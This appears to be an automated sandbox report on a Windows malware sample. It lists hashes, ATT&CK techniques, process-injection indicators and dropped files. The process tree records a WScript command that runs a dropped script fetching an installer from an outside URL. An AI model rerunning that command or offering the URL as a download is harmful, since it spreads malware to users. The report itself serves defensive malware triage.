27aa9b78132537f8795e4c367091189767c8bde64b863645f7e9e4935b3f5f42

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16/05/2024, 01:35

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe
Size

184KB
MD5

48f5ec6e5ae8b9ed9f3f7d4641f35d3f
SHA1

64861d65a81aa674a529c11db024b14fabeadb18
SHA256

27aa9b78132537f8795e4c367091189767c8bde64b863645f7e9e4935b3f5f42
SHA512

7bfa486098ebe630de2228ce9ab62714012f0ead400c8654336c21b1b5d7d3002a300733ab62b93414f900c47088f6e78dd0037c6d0c0f20941f18da2a3fd8f6
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3M:/7BSH8zUB+nGESaaRvoB7FJNndnt

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	2480	WScript.exe
8	2480	WScript.exe
10	2480	WScript.exe
12	2436	WScript.exe
13	2436	WScript.exe
15	2196	WScript.exe
16	2196	WScript.exe
18	1740	WScript.exe
19	1740	WScript.exe
21	2824	WScript.exe
24	2824	WScript.exe
26	2824	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 2480	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	28
PID 2156 wrote to memory of 2480	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	28
PID 2156 wrote to memory of 2480	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	28
PID 2156 wrote to memory of 2480	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	28
PID 2156 wrote to memory of 2436	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	30
PID 2156 wrote to memory of 2436	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	30
PID 2156 wrote to memory of 2436	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	30
PID 2156 wrote to memory of 2436	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	30
PID 2156 wrote to memory of 2196	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	32
PID 2156 wrote to memory of 2196	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	32
PID 2156 wrote to memory of 2196	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	32
PID 2156 wrote to memory of 2196	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	32
PID 2156 wrote to memory of 1740	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	34
PID 2156 wrote to memory of 1740	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	34
PID 2156 wrote to memory of 1740	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	34
PID 2156 wrote to memory of 1740	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	34
PID 2156 wrote to memory of 2824	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	36
PID 2156 wrote to memory of 2824	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	36
PID 2156 wrote to memory of 2824	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	36
PID 2156 wrote to memory of 2824	2156	48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\48f5ec6e5ae8b9ed9f3f7d4641f35d3f_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C00.js" http://www.djapp.info/?domain=PijUdzYglI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C00.exe
  2⤵
  - Blocklisted process makes network request
  PID:2480
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C00.js" http://www.djapp.info/?domain=PijUdzYglI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C00.exe
  2⤵
  - Blocklisted process makes network request
  PID:2436
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C00.js" http://www.djapp.info/?domain=PijUdzYglI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C00.exe
  2⤵
  - Blocklisted process makes network request
  PID:2196
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C00.js" http://www.djapp.info/?domain=PijUdzYglI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C00.exe
  2⤵
  - Blocklisted process makes network request
  PID:1740
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2C00.js" http://www.djapp.info/?domain=PijUdzYglI.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2C00.exe
  2⤵
  - Blocklisted process makes network request
  PID:2824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
32e84a8ac91a222e92faf4fb8bd7c62f

SHA1
79a50468dcb323c6e717801bd28ed6b92b715d78

SHA256
a9e7be8b876ac51708762297ea4662ef00393dfd7cd2dabd2c86ca8f4bd4a877

SHA512
bb0506e166f33a630abb0acb1ab6f793725b625eee44dda07815544a6082d5d26038b9783c2ddbc4cebb738abdc8cc71af02dce8b75f172930bc51f2fa2dfa6c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
73ab6c571787c63bae2bfa2d9d703963

SHA1
0aea5b73fc8f2758127241ea696a91a35a17537b

SHA256
9aa6dc36e036bd032464c1f1070462c489f7e4e2225da9dda24ad5be34e4e9bb

SHA512
0343be82728e3259bcf696fe83d9110d27798d3970c0f5309cf64e53b1940c8b3ca21a602511c0fe6840fe09ac5340c7f0316942e072267cb29aee0bd963d85f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
db78ab08d534ae4962de167b9e0ed759

SHA1
03193c3b4336943b850c3e4a709871ae1b304a07

SHA256
6ee12ec538628240ff683cf148b9ad282d7fbda377f92a35efd8b08e7ceba43b

SHA512
c7331e6f66422c4abd0a7d82ab68c6f46ff2945c11600fdd0d6ee341c3c89baee06fcc33fbb8a14a842232403a1d604f8d0175f7b4f68708a1325f52edea5b21

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
d4c7ade78b121f833ec6fdb6904a1fea

SHA1
f028c76272e68bb33a8b6142194fe34c111de5e7

SHA256
051187d0272c8a94c559221731dcdd8fb5eff4ede100078ba3c1c0255e7f67b8

SHA512
0a0f33189953efb77f84ef3739889ab4f02dfeac627b59d8f52fac0390e54d787ebadfc030161ebad8d72815446d268e25ade8dc33365491b593b0cc7fc4ae97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
6KB

MD5
da6bcdb276ce4ea1bbd2868c8030073b

SHA1
fe8c8c458142ef433c9ab2a726588870375516b8

SHA256
b94108d0d6a1ed5908f90339d673dea8a7bb8bfbc793c9c6fa1462680d1c0e2c

SHA512
06489110304b093d603c86eaa5c943b5f90ee5da917e872055c56548714f66a7f65d600fb5d329493be68a02b32c34b5d7426ae8e6760e59c9c9a1aee15288bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm

Filesize
6KB

MD5
ecad195ba714a134eb83c04ea71955ef

SHA1
78ae445a6ac10df4928a872768475ad7bdd76bc3

SHA256
dab84e173658c028bc0464cb07cc6a1fcc3f8e38e9b2a608f6da758440972e9f

SHA512
3bf76a9ca65b33aed04934131fea63825806e5b801bc2bbd5178d2e7f9bc372a4e3dcf310a8141a3ae4f8a511757f5e61d997945d1228192bc237d30b06317b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
1ba15690ca4a63f8f80ad15fda844e77

SHA1
f9a248a5200318442304f64c4e9226b1bd06565b

SHA256
356083b97852da03f8202becb4c097a7e107b11422aedfb42a5d8a73115ce9dd

SHA512
e18765ed6855d1339465aa155e25822cf65eb61022217da9c50556607d2ce428e21bac88d4f72443b3189cc169061334ec320dc24637ce973ba092434143a18a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm

Filesize
40KB

MD5
a85373e75f705ba2c4f1d909926e5fe7

SHA1
805d1f09129cd81c8b29d69e9db67a7a374a0637

SHA256
37e23a46b1ea0af583e3c3e19b1e7681c4d8ca102ea534a8355e2555643c87b2

SHA512
ca5da5c6e8f49eef80ee1455712184a188ff8979d90f2693aba24c594f2cedd10cae4d57f75271f24474acd649650d4b95a0afd47b6333e38ba19f464ce18cfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7475.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8C68.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf2C00.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WJOUI1K5.txt

Filesize
177B

MD5
33d66a54472d1ea0bdc189827900797a

SHA1
4875b5fe9e14c95e8a39779a3584143676e3d8c1

SHA256
222842e9e6e9de3131a26066e37d95d24e12a1e84c058608fd778f89cb9b83c9

SHA512
f4524adbe2e2f5f134ad65743f6333830b8b5cc8b89e07e7454a26bcf600b61f1f2d5a6682b76d6790788ae995361967b0a63a0246f373d1e76f8aaca4fe9a03

Download Submit